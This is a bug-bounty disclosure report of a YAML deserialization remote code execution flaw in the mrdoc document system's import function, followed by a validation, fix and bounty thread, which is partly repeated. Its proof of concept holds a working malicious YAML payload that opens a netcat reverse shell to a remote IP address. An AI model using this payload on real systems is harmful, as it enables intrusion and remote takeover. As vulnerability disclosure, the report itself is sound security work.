Deserialization of Untrusted Data in zmister2016/mrdoc

Valid

Reported on

Aug 29th 2021

✍️ Description

online document system developed based on python. It is suitable for individuals and small teams to manage documents, wiki, knowledge and notes. like gitbook this package is vulnerable for RCE due to Yaml.load in import function

🕵️‍♂️ Proof of Concept

Uploaded ZIp :

Payload.yaml :

!!python/object/new:type
 args: ["z", !!python/tuple [], {"extend": !!python/name:exec }]
listitems: "__import__('os').system('rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.1.102 8090 >/tmp/f')"

💥 Impact

This vulnerability is capable of RCE

Occurrences

import_utils.py L61

Abdul muhaimin submitted a

2 years ago

commented 2 years ago

Researcher

added a fix!

zmister2016 validated this vulnerability 2 years ago

Abdul muhaimin has been awarded the disclosure bounty

The fix bounty is now up for grabs

zmister2016 marked this as fixed with commit bb49e1 2 years ago

Abdul muhaimin has been awarded the fix bounty

This vulnerability will not receive a CVE

commented 2 years ago

Admin

CVE published! 🎉

commented 2 years ago

Researcher

Cool 💯

to join this conversation

Abdul muhaimin submitted a

2 years ago

commented 2 years ago

Researcher

added a fix!

zmister2016 validated this vulnerability 2 years ago

Abdul muhaimin has been awarded the disclosure bounty

The fix bounty is now up for grabs

zmister2016 marked this as fixed with commit bb49e1 2 years ago

Abdul muhaimin has been awarded the fix bounty

This vulnerability will not receive a CVE

commented 2 years ago

Admin

CVE published! 🎉

commented 2 years ago

Researcher

Cool 💯

to join this conversation